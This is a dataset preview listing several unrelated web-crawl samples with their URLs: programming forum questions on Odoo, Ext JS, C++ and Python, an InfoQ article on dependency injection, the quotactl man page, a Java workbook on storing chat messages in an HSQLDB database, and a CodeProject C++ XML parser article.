text
stringlengths 20
1.01M
| url
stringlengths 14
1.25k
| dump
stringlengths 9
15
⌀ | lang
stringclasses 4
values | source
stringclasses 4
values |
|---|---|---|---|---|
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
How to set to draft the stock picking out when state is cancel?
Hi,
I want to set to draft the stock picking out when state is cancel. How can I do that?
I know that is possible create a button and set the state to draft, but in this particulary case change the state isn't enough because it has movement of products in stock move and in stock inventory.
I have created a button "Set to Confirmed":
This button call this function:
def set_to_confirmed(self, cr, uid, ids, context=None): """ Changes picking state to delivered. @return: True """ for stock_picking_out_ids in ids: stock_picking_out_obj = self.browse(cr, uid, stock_picking_out_ids, context) move_lines = stock_picking_out_obj.move_lines for move_lines_obj in move_lines: self.pool.get('stock.move').write(cr, uid, move_lines_obj.id, {'state': 'confirmed'} ) self.write(cr, uid, ids, {'state': 'confirmed'}) return True
This works and change the state to confirmed but after this I can't continue the workflow, in others words, the button that appears in this state "Check Availability" and "Force Availability" doesn't work and give me a error:
Not enough stock, unable to reserve the products
Any ideia the steps that I have to do to this functionality works?
here are many stuff your code aren't respecting the workflow of stock.picking you are jumping the transition from draft to confirm, you can't go back a state of picking by python code with function write() and hope that the workflow of picking work fine. the workflow of the picking has two node of flow stop, when the state of picking are cancel or done when the picking are in state cancel you must regenerate the workflow
in this way:
def set_to_draft(self, cr, uid, ids, *args): if not len(ids): return False move_obj = self.pool.get('stock.move') self.write(cr, uid, ids, {'state': 'draft'}) wf_service = netsvc.LocalService("workflow") for p_id in ids: moves = move_obj.search(cr, uid, [('picking_id', '=', p_id)]) move_obj.write(cr, uid, moves, {'state': 'draft'}) # Deleting the existing instance of workflow for PO wf_service.trg_delete(uid, 'stock.picking', p_id, cr) wf_service.trg_create(uid, 'stock.picking', p_id, cr) for (id, name) in self.name_get(cr, uid, ids): message = _("Picking '%s' has been set in draft state.") % name self.log(cr, uid, id, message) return True
don't forget import netsvc
best regards
I think the correct answer to the question described in the title is: using a module like
stock_picking_back you share your module for community
|
https://www.odoo.com/forum/help-1/question/how-to-set-to-draft-the-stock-picking-out-when-state-is-cancel-37927
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
A client of mine wanted multi-row update for a large grid where he often updated many rows with the same values. Select by checking rows in the selection column, then any change to an editable field will propagate to the selected records.
Live example
If using this with Ext versions < 2.2, you might want to add the code below to stop the edit click to act as a row selection.If using this with Ext versions < 2.2, you might want to add the code below to stop the edit click to act as a row selection.Code:Ext.namespace('Ext.ux'); Ext.ux.MultiRowUpdateSelectionModel = Ext.extend(Ext.grid.CheckboxSelectionModel, { initEvents : function(){ Ext.ux.MultiRowUpdateSelectionModel.superclass.initEvents.call(this); this.grid.on('afteredit', function(editEvent) { if (this.grid.selModel.selections.getCount() > 0) { this.grid.selModel.selections.each( function(rec) { if (rec !== editEvent.record) { rec.set(editEvent.field, editEvent.value); } }); } }, this); } });
Code:// Deactivate row selection by row click handleMouseDown : Ext.emptyFn
|
https://www.sencha.com/forum/showthread.php?41875-Ext.ux.MultiRowUpdateSelectionModel&p=228904&viewfull=1
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
I have been using Linux for two days and Python for about 4 hours. Before that I used Mickeysoft for more than 20 years.
I like to keep project files in a directory heirarchy away from the application I am using to create them. I'm trying to program the example on page 17 in 'Learning Python'. Not being familiar with the Linux style file system doesn't help. Basically, IMPORT can't find myfile.py, which I did create. As I understand it, myfile.py is located in the home/Rory/PythonWork directory.
Here are some of the things I have tried:
- Code: Select all
>>> import myfile
Traceback (most recent call last):
File "<pyshell#0>", line 1, in <module>
import myfile
ImportError: No module named myfile
- Code: Select all
>>> import myfile.py
Traceback (most recent call last):
File "<pyshell#3>", line 1, in <module>
import myfile.py
ImportError: No module named myfile.py
- Code: Select all
>>> import PythonWork.myfile.py
Traceback (most recent call last):
File "<pyshell#10>", line 1, in <module>
import PythonWork.myfile.py
ImportError: No module named PythonWork.myfile.py
- Code: Select all
>>> import home/Rory/PythonWork/myfile.py
SyntaxError: invalid syntax
I've tried many different iterations of paths, but I always get one of two errors: 1, module not found, 2. Syntax error
I'm using Idle 2.7 and not sure what directory I am in.
How do I import myfile.py?
|
http://www.python-forum.org/viewtopic.php?p=12432
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Hello. I'm still new in programming. (It has been about 2 days since I started reading tutorials online and practicing it). I still have a lot of time, a lot to learn, fortunately the school holiday is long in my local area (about 3 months).
Anyway, sorry for the long introduction. I just want to ask you a question regarding the warning message I got stated in the title.
I'm using an IDE, Microsoft Visual 2010 C++ Express. Please, take a look on this and tell me the part that is needed to be altered so that I solve this problem.
Code://This program is an answer to the question number 1 (now question 2!) given in. /*To convert Fahrenheit to Celcius: substract by 32, multiply by 5, then divide by 9. To convert Celcius to Kelvin; add 273.15. */ #include <iostream> #include <cmath> #include <iomanip> using namespace std; int main() { float LOWER, UPPER, STEP; cout << "This program can help you to make a table of conversion of temperature between Fahrenheit, Celcius, and Kelvin.\n"; cout << "Please specify the range of values of Fahrenheit temperature (from lowest to highest)\n"; cout << "and also the desired step (e.g: for 10 steps between range 0 and 100 is: 0,10,20,30... 100).\n"; cout << "by answering the questions given below.\n\n"; cout << "Enter the desired lowest value of Fahrenheit temperature and press ENTER.\n"; cin >> LOWER >> "\n"; cout << "Enter the desired upper value of Fahrenheit temperature and press ENTER.\n"; cin >> UPPER >> "\n"; cout << "Enter the desired steps within the range and press ENTER.\n"; cin >> STEP >> "\n"; //declaring variable. float Fahrenheit, Celcius, Kelvin; cout << setiosflags (ios::left); cout.width(20); cout << "Fahrenheit"; cout << "Celcius"; cout << setiosflags (ios::right); cout.width(20); cout << "Kelvin\n\n"; cout.setf(ios::fixed); cout.precision(2); for (Fahrenheit = LOWER; Fahrenheit <= UPPER; Fahrenheit = Fahrenheit + STEP) { Celcius = ((Fahrenheit - 32)*5)/9; Kelvin = Celcius + 273.15; cout << setiosflags (ios::left); cout.width(20); cout << Fahrenheit; cout << setiosflags (ios::left); cout.width (20); cout << Celcius; cout << setiosflags (ios::right); cout.width(20); cout << Kelvin << "\n"; } system("pause"); return 0; }
|
https://cboard.cprogramming.com/cplusplus-programming/152557-warning-c4244-=-conversion-double-float-possible-loss-data.html
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Overview
Atlassian SourceTree is a free Git and Mercurial client for Windows.
Atlassian SourceTree is a free Git and Mercurial client for Mac.
scriptoresque – a ClojureScript scriptoresque?
scriptoresque is now a plugin for Gradle, which adds ClojureScript support. It allows compilation with automatic namespace recognition. The plugin is based on the Java plugin and hooks into the standard configurations and archives.
Usage
Create a
build.gradle script in the root directory of your project. Note
that gradle derives the project name from the name of this directory!
buildscript { repositories { maven { url '' } } dependencies { classpath 'clojuresque:scriptoresque:1.0.0' } } apply plugin: 'clojurescript'
Meta plugin
This is a meta plugin applying the various parts of the clojuresque and scriptores
|
https://bitbucket.org/clojuresque/scriptoresque/overview
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Dependency Injection: New Ground or Solid Footing?
- |
-
-
-
-
-
-
Read later
My Reading List
Andrew McVeigh has written a detailed history of dependency injection, summarized here. McVeigh is an academic that is working on architecture description languages (ADLs) as part of his Ph.D. He has also worked with Rod Johnson on a commercial product.
McVeigh writes:.McVeigh provides this definition of a software component:
A component is a unit of software that can be instantiated, and is insulated from its environment by explicitly indicating which services (via interfaces) are provided and required.McVeigh compares software components with electronic components since both should be "interchangeable, tangible units which are clear about which services they provide and which services they require." As you wire up your receiver, speakers, DVD, and your new 96" HDTV, the shape of the input and output connectors explicitly inform you which services each component requires and provides, respectively.
A Java or .Net class is not a component per se. A class can describe what it provides by means of its interfaces, but it does not declare exactly what it depends on to run. It is true that method types declare what a specific method requires, but nothing declares what is required by the class as a whole. Spring and other DI containers fill this gap by allowing class annotations or external configuration files to explicitly declare what a class requires. Configuration together with a Java class creates a software component that almost meets McVeigh's definition. Spring Bean's fall just short of McVeigh's definition of a component because for Spring the connectors are implicit - you can only set the bean property and Spring simply calls the setter.
A major feature of ADL's is the fact that the connectors are explicit. It's not just loose wire, but a cable with an HDMI connector on the end. The explicit nature of the connectors provide ADLs with interesting architecutal features, including improved testability and improved architecural tooling. In certain ADL's the connectors can be more functional. They can act like components in their own right, by performing extra functions like filtering or error handling.
Another major differentiator between ADLs and current DI technology is the notion of a Composite Component. Once you've wired all your electronics together, you have a Home Entertainment System. Yet, it isn't like Frosty the Snowman. There is no additional entity that magically appears once everything is put together just so. Your Home Entertainment System is nothing but the components and the wires that connect them.
Using McVeigh's ADL language called Backbone, you can create a new Composite Component by wiring up existing components. You can't perform this trick with Spring today since every Spring bean must be associated with a class. Despite it's power, Backbase is much easier to read than Spring XML configurations.
McVeigh narrates and interesting history of ADL. The first ADL was Conic, written in Pascal and used in distributed computing in the 1980s. Another ADL, Darwin, influenced COM. The UML specification contains an ADL that was influenced by Rational Realtime and the ROOM methodology.
Some of the future directions of dependency injection that McVeigh details include:
- The ability to swap out components at runtime.
- Evolving systems over time by capturing the change sets in ADL.
- Fractal-like composition - being able to drill into a layered system and see composite components at every level.
- GUIs - a natural fit for composite development
- Architectural design and analysis tools.
McVeighs shows us that not only is Dependency Injection here to stay, but it has a long history and an interesting future.
*Note: editted Feb 1st in response to reader comments
andrew mcveigh
Just a few minor points. My component language is Backbone, rather than Backbase. Also, the UML was influenced by ROOM and Rational Realtime rather than the other way around.
In this first article, I wasn't able to describe the key Backbone features, as I felt I needed to cover the similarities between ADLs and DI. I'll write up Backbone per se in the second article. The key point of Backbone is that it allows wiring changes for component reuse. Explicit connectors are a bit of a must for this type of facility.
Rod (Johnson) also pointed out that the new namespace features in Spring2.5 should allow me to build the composite features directly into Spring. I plan to try this out, as it sounds quite interesting.
Cheers (and thanks),
Andrew McVeigh
Cheers,
Andrew McVeigh
Re: good summary
by
Jep Castelein
Over the years we've been confused with:
-'backspace'
-'backpack', the ajax-based project manager
-'jackbase', combination of Jackbe and Backbase
And more...
Jep
Re: good summary
by
Michael Bushe
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
Michael
Re: good summary
by
andrew mcveigh
Whoops! Yes, I do a lot of work with RIAs so I mentally slipped in Backbase for Backbone. My apologies.
No worries! Backbone isn't a great name at any rate. Since the language is so close in syntax to Darwin, the neat-o name for it would be Huxley (Darwin's bulldog) which is also the name of building of the comp sci department of Imperial... I just can't be bothered to change it ;-)
Following up on your notion of convergent evolution -- when I designed Backbone, I had never seen Darwin. Bizarrely, the syntax turned out to be very, very similar and many of the concepts are identical even though Darwin is perhaps 8 years older. The same needs lead to similar solutions, I guess. In retrospect I probably took my terminology from UML which was influenced by the ADLs.
I look forward to your future articles. Backbone is such a nice little language, I would like to see it integrate directly with Spring as an alternative to XML. Is this the type of integration you are planning?
I wasn't planning this (although it's an interesting idea and closely linked to the discussion on XML versus language grammars). Backbone is more of a proof of concept (and interestingly the runtime for my case modelling tool). I think that writing Backbone/Spring at the level of text isn't great -- I see the text form as an means to an end. What i meant is that i would use the Spring namespace features to add simple connectors to spring. I may also add a simple form of composites. I will be doing this as part of a case study for inclusion into my phd.
Instead of using text to create these types of configurations, I use a UML2 case tool I have spent the last 3 years on. It can model these architectures in a very pleasant and intuitive way. It's called jUMbLe and all the pictures in my article are from it. It has sophisticated features for the rewiring and checking abilities I allude to in my article, which allow reuse and evolution of a component system to be modelled (the core of my phd). The plan is to generate Spring output (as well as other ADLs) from the models (hence the need to add extra expressiveness to the Spring config). At the moment, I just generate Backbone which is not as "production capable" as Spring (also less feature rich in many other areas -- e.g. no aspects).
Interestingly, my phd started with the idea of using Backbone as the plugin architecture for my case tool. My goal (soon to be reached) is that jUMbLe is able to manipulate its own component architecture! The aim is to form a very extensible componentised case tool... The working title for my thesis is "An Architectural Approach for Extensible Applications" or something like that ;-)
Here's a picture of a dummy architecture i'm modeling as an example:...
This shows the evolution of a "Stereo" component -- I have replaced a component instance with the "EnhancedMixer" component instance. This is one type of rewiring where i have disconnected the old mixer and wired in a new one as a delta change.
Another feature worth quickly mentioning is that this example shows type inferencing on the ports of Stereo. The interface types have been inferred from the internal connections of the component.
Cheers,
Andrew
Article Fixed
by
Michael Bushe
I look forward to seeing your project develop, it looks like a great tool, and especially cool if it can output Spring config.
Michael
Re: good summary
by
andrew mcveigh
Cheers,
Andrew
Last point worth re-reading...
by
Jim Leonardo
Wow... I suspect McVeigh's got an industry background? true?.
Re: Last point worth re-reading...
by
andrew mcveigh
"Finally, McVeigh laments the disconnect between academic and industry in software development."
Wow... I suspect McVeigh's got an industry background? true?
Yes, I've spent the last 18 yrs working on commercial s/w systems, although i also spent time as a speech researcher in my misspent youth (he laments on the day before his 40th birthday ;-).
True about many of the computer science formalisms, although I think there has to be give and take on both sides which happens (albeit slowly). E.g. BNF (and lots of parsing theory) is based on Chomsky grammars, a good example of how something that is once considered to be of mainly academic interest has now been accepted as a standard s/w engineering technique.
My belief is that both academia and industry need to find a healthy middle ground. Too often getting a paper published in an academic journal is about putting sophisticated spin on fairly simple ideas so that it will get published (the reviewers are often incredibly mean). Academia needs to strive for simplicity of explanation. On the other side, too often industry accepts substandard s/w simply because the market doesn't expect better either ignoring of dismissing academic results that could be applied. It's really not good enough.
At the core of s/w engineering research is completely mind-blowing stuff, which unfortunately needs to be understood to be applied: things like turing machines and complexity modeling, the pi calculus (for mobile systems), CSP for modeling concurrency and checking for deadlock etc, model checking (got 2007's turing award) for checking systems. i think (hope) that as this type of stuff becomes more accepted by s/w engineers, they will eventually be as commonplace as BNF is now.
I remain optimistic: things like automata behind regular expressions are considered old hat now, but they are also the basis of much of the theory of computer science. I sincerely hope that in time, developers will be to computing as surgeons are to medicine -- i.e. the theory and practice meet up in the same group of people.
Cheers,
Andrew
p.s. I agree with you about much of the academic papers on computer languages, though. I really struggle with these. I think they tend to be a bit ridiculous...
|
https://www.infoq.com/news/2008/01/dependency-injection
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
quotactl - manipulate disk quotas
Synopsis
Description
Return Values
Errors
Colophon
#include <sys/quota.h> #include <xfs/xqm.h>
int quotactl(int cmd, const char *special, int id ", caddr_t " addr );
The quota system can be used to set per-user and per-group limits on the amount of disk space used on a file system. For each user and/or group, a soft limit and a hard limit can be set for each file system. The hard limit cant be exceeded. The soft limit can be exceeded, but warnings will ensue. Moreover, the user cant file system being manipulated.
The addr argument is the address of an optional, command-specific, data structure that is copied in or out of the system. The interpretation of addr is given with each command below.
The subcmd value is one of the following:There is no command equivalent to Q_SYNC for XFS since sync(1) writes quota information to disk (in addition to the other file system metadata that it writes out).
On success, quotactl() returns 0; on error -1 is returned, and errno is set to indicate the error.
quota(1), getrlimit(2), quotacheck(8), quotaon(8)
This page is part of release 3.44 of the Linux man-pages project. A description of the project, and information about reporting bugs, can be found at.
|
http://manpages.sgvulcan.com/quotactl.2.php
|
CC-MAIN-2017-09
|
en
|
refinedweb
|
Further Java Practical Class
Table of Contents
Last week you wrote your own implementation of a Java chat server. This week you will extend your implementation of the Java chat server and integrate a database. The database will be used to store some basic statistics on the use of the chat server together with a record of the conversations which take place. In addition, you will modify the server to replay the last ten messages sent between participants to any new user connecting to the.
All of the functionality described it this workbook could, in principle, be achieved by writing data into files in the filesystem. However databases provide several advantages over the filesystem interface in Java. In the context of this workbook, the database provides two distinct advantages: (1) a rich query language which permits the retrieval of precisely the data required from the database; and (2) support for concurrent transactions, permitting more than one Java thread to update data stored in the database without corruption.
There are a huge number of database systems to choose from. In this workbook you will use HSQLDB (), a database written in Java which supports Structured Query Language (SQL). Knowledge of SQL is not an examinable part of this course. You will cover this topic area in much greater detail in the Part 1B Databases course in Easter term.
In order to use HSQLDB, you will need a database driver. Please download the following jar file from the course website now and save it in your home directory:
You will need to tell Eclipse to use this jar file when running your program. Later in the workbook, when you first run an application which accesses a database, you will need to choose Run As... and in the dialog which appears select the "Classpath" tab and add
hsqldb.jar as an external jar.
HSQLDB is able to store a record of all the data in the database as a small set of files in the filesystem, and this is the method we will use today. A production version of the Java chat server would use a more sophisticated configuation in which the database was run as a separate operating system process, the details of which are beyond the scope of this course. To load the HSQLDB driver and create or load a database with a path prefix of
/home/crsid/chat-database you need to perform the following steps in Java:
Class.forName("org.hsqldb.jdbcDriver"); Connection connection = DriverManager.getConnection("jdbc:hsqldb:file:" +"/home/crsid/chat-database","SA",""); Statement delayStmt = connection.createStatement(); try {delayStmt.execute("SET WRITE_DELAY FALSE");} //Always update data on disk finally {delayStmt.close();}
This creates a small number of files whose names all start with
/home/crsid/chat-database and ensures that any changes to the database are also made to the filesystem. In the above code, and in the remaining examples in the rest of this section, the classes used to talk to the database can be found in the package
java.sql. For example, the fully qualified name for
Connection is
java.sql.Connection. Note that the above six lines are the only lines you will write which are specific to HSQLDB. All the remaining code presented in this Workbook will work with any SQL database.
Later on in this workbook you will modify the Java chat server you wrote last week to write to the database from within instances of the
ClientHandler class. In this workbook you should manually control when a transaction is committed to the database and therefore you will need to do the following:
connection.setAutoCommit(false);
In an SQL database, data is stored in one or more tables. Each table has one or more columns and zero or more rows and each column has a type. For example, in order to store a record of all the
RelayMessage objects sent to your Java chat server, you might create a table with three columns: a column to record the nickname of the individual who sent the message, a second column to record the message contents, and a third column to record the time. Each row in the table can then be used to record a specific message sent by an individual to the Java chat server at a specific time. The following piece of SQL creates such a table:
Statement sqlStmt = connection.createStatement(); try { sqlStmt.execute("CREATE TABLE messages(nick VARCHAR(255) NOT NULL,"+ "message VARCHAR(4096) NOT NULL,timeposted BIGINT NOT NULL)"); } catch (SQLException e) { System.out.println("Warning: Database table \"messages\" already exists."); } finally { sqlStmt.close(); }
In the above snippet of code, the programmer has first got a handle on a new
Statement object by using an instance of the
Connection class you created earlier. This object is then used to execute an SQL query on the database. The query itself is written inside a Java
String. The table is called
messages and contains three columns. The first column is called
nick and is of type
VARCHAR(255), which means it can hold a string of up to 255 characters in length; the phrase
NOT NULL means that the database will not permit the storage of nothing, a string of some description must be provided. The column
message is of type
VARCHAR(4096) and is therefore able to store a string of up to 4096 characters. Finally, the column
timeposted records the time at which the message was sent; the type
BIGINT is a 64-bit integer value, equivalent to a Java
long.
Rows can be added to the table using the SQL command
INSERT. Here is an example which adds one row to the
messages table defined above:
String stmt = "INSERT INTO MESSAGES(nick,message,timeposted) VALUES (?,?,?)"; PreparedStatement insertMessage = connection.prepareStatement(stmt); try { insertMessage.setString(1, "Alastair"); //set value of first "?" to "Alastair" insertMessage.setString(2, "Hello, Andy"); insertMessage.setLong(3, System.currentTimeMillis()); insertMessage.executeUpdate(); } finally { //Notice use of finally clause here to finish statement insertMessage.close(); }
In the above example a different kind of SQL statement, a
PreparedStatement, is used. This type of statement is useful when providing values from variables in Java. In the above, the three values to be added to the new row are substituted with question marks (
?) in the statement. These question marks are replaced with values drawn from Java variables inside the try block. For example, the first question mark (representing the value for the column
nick) is updated with
"Alastair" within the call to
setString. This method of submitting data to the database looks laborious, but it is important to use this method. The alternative, preparing your own
String object with the values held inside it directly, is likely to lead to error since many careful checks are needed (with string length being just one of them). It's good practice to use the
PreparedStatement class to do this for you.
The database supports multiple simultaneous
Connection objects. Each of these objects permit concurrent modifications (such as creating tables or adding rows to the database), and the results of any changes made to the database are isolated until the method
commit is called on the
Connection object. In other words:
connection.commit();
When
commit is called, the thread of execution blocks until all the outstanding SQL statements which have been performed in isolation are written to the database for all other threads to see. Furthermore, all the statements are added in an atomic fashion and consequently all views of the database are consistent.
Data stored in tables can be retrieved by using the SQL
SELECT statement:
stmt = "SELECT nick,message,timeposted FROM messages "+ "ORDER BY timeposted DESC LIMIT 10"; PreparedStatement recentMessages = connection.prepareStatement(stmt); try { ResultSet rs = recentMessages.executeQuery(); try { while (rs.next()) System.out.println(rs.getString(1)+": "+rs.getString(2)+ " ["+rs.getLong(3)+"]"); } finally { rs.close(); } } finally { recentMessages.close(); }
This query returns the top ten most recent posts made by users, latest first. The data returned contains the contents of the columns
nick,
message and
timeposted. The contents of the top ten rows are returned encapsulated inside a
ResultSet object. Notice how the object
rs is used to interact with the database—each call to
rs.next loads the next row of data into the
ResultSet object
rs, and calls to
rs.getString or
rs.getLong are used to retrieve the individual column elements of that row. Also, pay particular attention to the use of the
finally clause—it's important to call
close on any instance of
ResultSet or
PreparedStatement after data has been collected, both in the case where execution proceeds normally, and in the case where an
SQLException object is thrown when executing the method
recentMessages.executeQuery or
rs.next; the
finally clause does this neatly.
Whenever your Java program terminates, make sure you close all open database connections:
connection.close();
Full documentation of HSQLDB are available on-line:
This workbook has so far only covered the creation of tables, the addition of rows, and the recall of data from a single database table; the
UPDATE query will be described briefly in the next section. Knowledge of this subset of features is sufficient to complete this Workbook, however you will probably find it helpful for your Group Project work next term, as well as in preparation for the 1B Database course and your general education, to consult the HSQLDB documentation over the holidays and read about
DROP TABLE (i.e. delete a table and all its contents) and
DELETE (remove zero or more rows). There are also many more advanced uses of the
SELECT statement to retrieve and combine data stored in multiple tables.
The last section introduced a small subset of SQL and the associated Java language bindings. In this section you will modify your implementation of the Java chat server you wrote last week to make use of the database. Your database should store data in two tables: (1) the details of every message sent through the server should be recorded in a table called
messages with exactly the same column definitions provided in the last section; and (2) a table called
statistics which should have the following SQL definition:
CREATE TABLE statistics(key VARCHAR(255),value INT)
The
statistics table should only ever have two rows, which must be initialised only when the table is first created. The initialisation is given in the following two lines of SQL:
INSERT INTO statistics(key,value) VALUES ('Total messages',0) INSERT INTO statistics(key,value) VALUES ('Total logins',0)
Whenever a user logs in to the server, you should increment the count associated with the row recording the total number of logins as follows:
UPDATE statistics SET value = value+1 WHERE key='Total logins'
You should increment the count associated with the row recording the total number of messages whenever a new message is sent in similar fashion.
Rather than scatter the details of the database across multiple locations in your implementation of the Java chat server, you should enhance the definition of your
Database class you wrote in the last section to provide a suitable abstraction. In particular, you should define the following fields and methods inside the class
Database:
public class Database { private Connection connection; public Database(String databasePath) throws SQLException { ... } public void close() throws SQLException { ... } public void incrementLogins() throws SQLException { ... } public void addMessage(RelayMessage m) throws SQLException { ... } public List<RelayMessage> getRecent() throws SQLException { ... } public static void main(String []args) { /* leave as-is */ } }
Please do not modify the contents of the main method—leave it exactly as specified in the previous section. The implementation details of the remaining methods and field are as follows:
The class
Database has a single constructor which takes a string describing the filesystem path prefix to the database on disk. The constructor should load the HSQLDB driver and initialise the field
connection with a connection to the database; you should also create the database tables if they don't already exist.
The method
close should do (almost) the inverse of the constructor, namely call the
close method on
connection.
The
incrementLogins method should use the reference held in the field
connection to update the appropriate value stored in the
statistics table. Don't forget to call
commit!
The
addMessage method should add the contents of the
RelayMessage object
m to the
messages table and increment the appropriate value stored in the
statistics table. Make sure you do both these updates as part of one transaction so that concurrent execution of this method is thread-safe. (Thread-safety is essential so that later on, when this method is invoked by instances of
ClientHandler, data in the
statistics table are correctly recorded.)
The method
getRecent should retrieve the top ten most recent messages from the
messages table, and copy them into a class which implements the
java.util.List interface.
Your final task this week is to integrate your implementation of
Database so that it is used by your implementation of the Java chat server. To do so, you will need to do the following:
Create a new field called
database of type
Database inside the
ClientHandler class. Modify the constructor to the
ClientHandler class to accept a reference to a
Database object as the third argument and update
database in the constructor to reference it.
Modify the
main method in
ChatServer to accept two arguments on the command line: the port number for the service, and the filesystem path prefix to the database. Your implementation of the
main method of
ChatServer should then create an instance of
Database and pass a reference to this into the constructor of
ClientHandler.
Modify your implementation of
ClientHandler so that when a new client connects, it receives up to ten objects of type
RelayMessage immediately which represent the ten most recent messages stored in the
messages table in the database. (Hint: call the method
getRecent on the field
database.)
Whenever a new user connects to the server, a suitable part of the
ClientHandler class should call the method
incrementLogins on the field
database.
Whenever a user sends a serialised instance of
ChatMessage to the server, modify your implementation of
ClientHandler to add the message to the database by calling
addMessage on the field
database.
You have now completed all the necessary code to gain your fifth ticklet. Please generate a jar file which contains all the code you have written for package
uk.ac.cam.crsid.fjava.tick5 together with the code you downloaded and imported in package
uk.ac.cam.cl.fjava.messages. Please use Eclipse to export both the class files and the source files into a jar file called
crsid-tick5.jar. Once you have generated your jar file, check that it contains at least the following classes:
crsid@machine~:> jar tf crsid-tick5.jar META-INF/MANIFEST.MF uk/ac/cam/crsid/fjava/tick5/ChatServer.java uk/ac/cam/crsid/fjava/tick5/ChatServer.class uk/ac/cam/crsid/fjava/tick5/ClientHandler.java uk/ac/cam/crsid/fjava/tick5/ClientHandler.class uk/ac/cam/crsid/fjava/tick5/Database.java uk/ac/cam/crsid/fjava/tick5/Database.class uk/ac/cam/crsid/fjava/tick5/MessageQueue.java uk/ac/cam/crsid/fjava/tick5/MessageQueue.class uk/ac/cam/crsid/fjava/tick5/MultiQueue.java uk/ac/cam/crsid/fjava/tick5/MultiQueue.class uk/ac/cam/crsid/fjava/tick5/SafeMessageQueue.java uk/ac/cam/crsid/fjava/tick5/SafeMessageQueue.class uk/ac/cam/cl/fjava/messages/ChangeNickMessage.class uk/ac/cam/cl/fjava/messages/ChangeNickMessage.java uk/ac/cam/cl/fjava/messages/ChatMessage.class uk/ac/cam/cl/fjava/messages/ChatMessage.java uk/ac/cam/cl/fjava/messages/NewMessageType.class uk/ac/cam/cl/fjava/messages/NewMessageType.java uk/ac/cam/cl/fjava/messages/Message.class uk/ac/cam/cl/fjava/messages/Message.java uk/ac/cam/cl/fjava/messages/RelayMessage.class uk/ac/cam/cl/fjava/messages/RelayMessage.java uk/ac/cam/cl/fjava/messages/StatusMessage.class uk/ac/cam/cl/fjava/messages/StatusMessage!
|
http://www.cl.cam.ac.uk/teaching/1213/FJava/workbook5.html
|
CC-MAIN-2014-10
|
en
|
refinedweb
|
This article is about a simple and fast C++ XML parser class. There is often a need for an effective XML parser that is able to load the XML document, validate it, and browse it. In .NET environment there is a large native support for handling a lot of types of XML documents, but the same native support is missing from the original C++, MFC etc. There is, however, a COM alternative for XML file parsing and handling but it takes some time to learn it, and to use it in the right way.
This article is a simple attempt to make a C++ developer's life a bit easier than it usually is. This is support for handling the well-formed XML documents in the simplest possible way: load it, validate it, and browse it. This supports the following XML elements:
Below is an example of a simple XML file that is supported:
<?xml version="1.0" encoding="ISO-8859-1"?>
<note>
<to>Tove</to>
<from>Jani</from>
<heading>Reminder</heading>
<body>Don't forget me this weekend!</body>
</note>
The presented XML classes are able to load this type of XML document, check if it is well-formed, and browse throughout its content. There are only two classes that provide this functionality.
The first class is called the CXMLFile class, and its main purpose is to load an XML file, validate its structure, and create an XML element collection out of its content. This collection of XML elements will represent the loaded XML file in the system memory. Its easy then to modify the inner struture of this collection, that is, to modify the XML file itself. This class also supports the loading of XML files from the hard-disk or from the memory stream, which is a special usage (ie. on some web server). The CXMLFile class can also output the XML element collection from the system memory to the file on the hard-disk.
CXMLFile
The second class is called the CXMLElement class. It is used by the previous class, and will be used by the developer when browsing or modifying the inner structure of an XML file in the system memory, that is, when modifying the inner structure of the XML element collection. It has the basic support for the appending of this collection, and browsing it. It can provide information regarding the name, type or value of the current XML element from the collection.
CXMLElement
There are many articles on the CodeProject considering this topic, and this is a small contribution to these articles population. Hope that the readers and developers will find it useful in their everyday work.
It's quite easy to load an XML document from the hard-disk. See an example below:
#include <span class="code-string">"XMLFile.h"</span>
...
_TCHAR lpszXMLFilePath[] = _T("A path to the XML file here...");
CXMLFile xmlFile;
if (xmlFile.LoadFromFile(lpszXMLFilePath))
{
// Success
}
else
{
// Error
}
To load an XML document from the memory stream:
...
// lpData and dwDataSize are obtained elsewhere
CXMLFile xmlFile;
if (xmlFile.LoadFromStream(lpData, dwDataSize))
{
// Success
}
else
{
// Error
}
To save the XML element collection to the file on the hard-disk, do the following:
if (xmlFile.SaveToFile(lpszXMLFilePath))
{
// Success
}
else
{
// Error
}
After the call to LoadFromFile(), a method of the CXMLFile class, the validation and parsing of the custom XML file will be done. If the XML file is well-formed, it will be loaded in the system memory as collection of CXMLElement elements. One can gain access to this collection using another method of the CXMLFile class called GetRoot(). See below:
LoadFromFile()
GetRoot()
CXMLEElement* pRoot = xmlFile.GetRoot();
Having the pointer to the root-element of the XML collection in the system memory, there are some things that can be done here. The root-element of the collection is of the CXMLEElement class type. Here are the methods available:
CXMLEElement
// Returns the name of the current XML element
LPTSTR GetElementName();
// Returns the type of the current XML element
XML_ELEMENT_TYPE GetElementType();
// Returns the number of child elements of the current XML element
int GetChildNumber();
// Returns the first child element of the current XML element
CXMLElement* GetFirstChild();
// Returns the current child element of the current XML element
CXMLElement* GetCurrentChild();
// Returns the next child element of the current XML element
CXMLElement* GetNextChild();
// Returns the last child element of the current XML element
CXMLElement* GetLastChild();
// Sets the value of the current XML element (valid only for attribute elements)
void SetValue(LPTSTR lpszValue);
// Gets the value of the current XML element (valid only for attribute elements)
LPTSTR GetValue();
Modify the inner structure of the XML element collection using the following methods:
// Create the new XML element of the specified type
void Create(LPTSTR lpszElementName, XML_ELEMENT_TYPE type);
// Appends the new XML element to the end of the collection of the current XML element
void AppendChild(CXMLElement* lpXMLChild);
Using the first group of CXMLEElement class methods, one can browse the XML element collection. Using the second group of CXMLEElement class methods, one can create new XML elements of different types and append them to existing ones.
Speaking about the types of XML elements, here are they listed:
XET_TAG // TAG element
XET_ATTRIBUTE // ATTRIBUTE element
XET_TEXT // TEXT element
I always had a problem with loading XML documents easily and manipulating with them. Now, I have useful classes that decrease my future development time when this type of work is required. I am also able now to easily parse RSS feeds that are used all over the Web. I am planning to extend this basic support to HTML, or XML documents that are not-so-well-formed, soon (when I find some more free
|
http://www.codeproject.com/Articles/24492/CXMLFile-A-Simple-C-XML-Parser?fid=1126460&df=90&mpp=10&sort=Position&spc=None&tid=4145442&PageFlow=FixedWidth
|
CC-MAIN-2014-10
|
en
